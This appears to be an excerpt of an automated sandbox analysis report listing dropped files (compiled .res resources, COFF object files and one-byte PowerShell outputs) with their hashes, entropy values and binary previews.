              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.w.l.c.j.2.c.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.w.l.c.j.2.c.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.065477641564169
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7YnqqEPN5Dlq5J:+RI+ycuZhNIakSEPNnqX
              MD5:7A7A695ED9B4839CF4A95F6D7EA3380D
              SHA1:D95223A5C357BF8611ECD7F6A4EDD7B1FF4767A3
              SHA-256:6BEED4CF9406576376FFD6746AF150A7783C42B72F97D07E43FDE855B7F4682D
              SHA-512:BA89C4E14D245D287BB0D012E2F040FCDE510AEED49FAF2ADC1B11C135777575E965563FD7004B724CCB3B5585C7CF64DAB90605FAE1291AB14A111CE8080F24
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.p.t.0.a.0.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.p.t.0.a.0.u.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.0979995598369467
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVsak7YnqquhPN5Dlq5J:+RI+ycuZhNPsakSuhPNnqX
              MD5:BA6B36A22F29C8CC1CA62C3541556253
              SHA1:051A01AD9D1E2A9BCB749331D7BF5510E7B6DD69
              SHA-256:DB6F27C18ECAF0579F508CCDB669E2EBF9273EFC744B7F288C7838C46307C761
              SHA-512:1E56783DA07229E4B903549583FD2AB3ECE4996609A0EB561D66DA6F95172665AEB310A637AA663E7012520EB80F16D8EA02BFA957A4E449A6EABE5FD2DD68D7
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.g.g.3.o.5.n.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.g.g.3.o.5.n.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.0852621132113396
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycWJqak7Ynqq/WJbPN5Dlq5J:+RI+ycuZhNxqakSmbPNnqX
              MD5:0BE267FE339A54A24DAA9E65E6F95CB5
              SHA1:F0A26EBA80A57C9AE877DDA515CD8839AB248DBC
              SHA-256:E289D53A2DDEB704A64E7D836DECE0BE9D15DE35E995DF87B82C8B422E74D867
              SHA-512:E165B38330334FAF890C1F9987A26EA413FEABCC0E57D15168CAA56E4815875BCF5B43EAB46A849A9FC075D6D1C3206F3C16DE0EFAEC42A2BBC5F7BFE2BF75A2
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.s.i.h.c.h.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.h.s.i.h.c.h.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1190774050764096
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyrak7YnqqBEPN5Dlq5J:+RI+ycuZhN4rakSBEPNnqX
              MD5:5D1F8A6103781ABBC01C0A7CDBDB55F1
              SHA1:84D704124B90721B76E1CA4442A54BA949084DDA
              SHA-256:53D6E3E968DB598701D042DB4EA37861E7EC7E0C32F917418FD5722AEC09CDF7
              SHA-512:FC6C65655E99267E970B5BE32B0E268DA20FDF31864F381150797C00FBE046F3D7FCB553D5E3AC52E81753D63E1BC2C3B6EB1E3F00F592CF4EF05A36117813A6
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.y.q.1.c.2.c.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.y.q.1.c.2.c.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1126231554769914
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTKCqak7Ynqq+KCbPN5Dlq5J:+RI+ycuZhNSakSaPNnqX
              MD5:2E143A93A2C9C276940D7D7645DC9F15
              SHA1:0C0C63550213FFFE37A2B30E44DF6E71B0776D92
              SHA-256:5F4FBDDD36C8511BADBD3355A57D1855779B37C310DAA69CE83F897C72D6BAFA
              SHA-512:324B9E4F2D55A95D7AF6FA31D5BCED3C92680AAB697D3A018045FE093810AFA8D8D8F124116EDA46256ECFD26247321C71CC8BD7D9FB20840E1FC8BFA1371FFC
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.j.f.y.4.3.1.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.j.f.y.4.3.1.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.078304088227274
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysIsqak7Ynqq1IsbPN5Dlq5J:+RI+ycuZhNaItakS1IiPNnqX
              MD5:B40A0EC8107302ECF30F3151B8248712
              SHA1:20BA5ECE74A719F1E7E8835CB603E02B2ABBAE2A
              SHA-256:900DA9E1423AC9AAF5311E7415F5F2E76882D12902B96606B3D80910D1E4A416
              SHA-512:30290195C78AD669DF473C11EB05E72F5148ABC3BBDEC17902D27016366927C44EAC5BD20E3058FD598FDD301EC69BCDD6F1EC4693C4C33C55F72844AD298D61
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.e.p.r.c.m.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.e.p.r.c.m.t.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.973199456396972
              Encrypted:false
              SSDEEP:24:HMnW9rphlF1ahHBhKdNWI+ycuZhNIakSEPNnq9hgd:KWPIvKd41ulIa3Eq9y
              MD5:9042878F130635563C43742E2E83367F
              SHA1:680B4C0C9B34FEBB34312D5B1002FD0C84D0BB48
              SHA-256:5142B2B66B4FE66C0B8AA98FEE8E10FCD12B4F06D727A388BCC199CEC0BB2576
              SHA-512:4B2E3D70602A912EC959A384FBA9A51242697756B5BFDC3838F4309093892D2BDA3461E3A2551071F05BA99BEBF047A6F2FB522442126C9D218005E5BF353781
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP................zzi^....._m~.8...........4.......C:\Users\user\AppData\Local\Temp\RES105D.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.p.t.0.a.0.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.976565381157867
              Encrypted:false
              SSDEEP:24:H9MnW9r0QhHhhKdNWI+ycuZhNxqakSmbPNnq9hgd:YWZPKd41ulxqa3mRq9y
              MD5:BCA81E8793B496D3AD1690253CC3F263
              SHA1:3F66CAE801FB007C9D64D3C7FF6E9C4B1ECFF6F7
              SHA-256:A8C74C4C9F87B03A1E65BF219EDCB76F3D63A45733673BB4E402A1635A4F6BA5
              SHA-512:2827CA85F359F61008EEDD9EF6933CCCC2361E4244CF73F3BD9D383770E61C2F6AFC6DFBDC271631AA2B5A410C9460B24B5C202842090A6F35EDA541C0697EE1
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP..................g.3.T.M..e..\...........4.......C:\Users\user\AppData\Local\Temp\RES2E65.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.s.i.h.c.h.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.9718406859930306
              Encrypted:false
              SSDEEP:24:H3nW9rUhHmhKdNWI+ycuZhNaItakS1IiPNnq9hgd:3Ww8Kd41ulaIta31Iuq9y
              MD5:4D52D282A050FBD77DCF3B62ADAEB815
              SHA1:E9464278394931D88B682821B00B7405A4D564AC
              SHA-256:2E65D5A8DE9DA248BE6DFB8F2B6C9C9F56D36F2A978D2DD41ACEE2DA516EE930
              SHA-512:565E965DA8543FE40E14064756D11CACBDB1557158FB8DDF0DCAA2E263C778C5B05CCFA91AFBEC8C00B53BC351BA9E04EAD53BB02B27C1B4E4A2499A84E2FCF2
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP.....................s....1Q.$............4.......C:\Users\user\AppData\Local\Temp\RES3848.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.e.p.r.c.m.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:24:HbnW9Q3oIhnhHkFhKdNWI+ycuZhNv6akSOLPNnq9hgd:T531hhEzKd41ulia3Gq9y
              MD5:4340D378D85430E4B567D8325AD7B630
              SHA1:8D4AF2B92289F05060A29A58A25FFF62497012F3
              SHA-256:5F1CAC6C4FDC193B24E2114A1E044B1F54763C8229AB5602533C6FF35AE64529
              SHA-512:C61D0B0E4236581D24BA90ECA016035395A6B1DE2CC7715153073314B49D8CB4B8BE47B2CAC38AE1042FD3A8E2C79A6346DC3D60C47F7C4DC5FB5323F2E174F7
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP.................M!...C..k...yD...........4.......C:\Users\user\AppData\Local\Temp\RES4A3A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.q.v.o.g.m.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.9791603240651487
              Encrypted:false
              SSDEEP:24:HZnW9rItH9hKdNwI+ycuZhNPsakSuhPNnq9hgd:NWItrKdm1ul0a3oq9y
              MD5:E94034754ED647F643858219D8BED106
              SHA1:8985855D9E535B81B954539017A71A324E40D93A
              SHA-256:7F2554CA86A1707C7AA12864CAA3A1F9FA2952E6AFD1E0D200DED06F2E3C0BDB
              SHA-512:77987F0F0617B8C1076B12B937476767771B0D4662FDA56F8744514056D7FEDCF9E8C970158A341E3272B8A6A3F7A8620B8B000E3BDAC1537411D413F8722C07
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP.................k6./)....,5AUbS..........3.......C:\Users\user\AppData\Local\Temp\RESEA8.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.g.g.3.o.5.n.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.9847511803869358
              Encrypted:false
              SSDEEP:24:HunW9r9GjAOXhHlahKdNWI+ycuZhNSakSaPNnq9hgd:IW9dOx2Kd41ulSa3Wq9y
              MD5:08D2973E298791EDFC7E740782873E6A
              SHA1:23E6211CDBE8247EF38995D640CD31CD5DD094A1
              SHA-256:C6A673B3472B7AEBC8B20F68E87F09D7ABA4844971D6FD19C39D09B15D605813
              SHA-512:FA8FE70CE6DF4B1FC7B001865F9F6AEDB243F76570964D460195EB45D8F8F4B49763A3DC3CE1DBE26C80189F94DD35B2C8E46F720E2D45225F611A2798ED7721
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP..................:....v..}vE............4.......C:\Users\user\AppData\Local\Temp\RESEEEB.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.j.f.y.4.3.1.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x47e, 9 symbols
              Category:dropped
              Size (bytes):1316
              Entropy (8bit):3.980956265605215
              Encrypted:false
              SSDEEP:24:HAS9QiguhHPhKdNWI+ycuZhN4rakSBEPNnq9Gd:6igSJKd41ulaa3Oq92
              MD5:74149A607262FF6591455E30A294647F
              SHA1:30E7ADE77B6A73462A9690E595416CAFB46A7669
              SHA-256:BC161911416B32D3461A2D6904832963F8145979C5BA98FFE74CCFCE821894B8
              SHA-512:332E78135DEA0B1EDFE714C094D635878B14C3999BFBD5C60E5CC9313459A1C31FE88F9EE6576A11670C43B1C2098BE6F8C525131D318BA00F700301C87F35EF
              Malicious:false
              Reputation:unknown
              Preview:L.....a~............debug$S........@...................@..B.rsrc$01........X.......$...........@..@.rsrc$02........P...................@..@........H....c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP...............]..a.x.....|..U...........4.......C:\Users\user\AppData\Local\Temp\RESF563.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.y.q.1.c.2.c.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
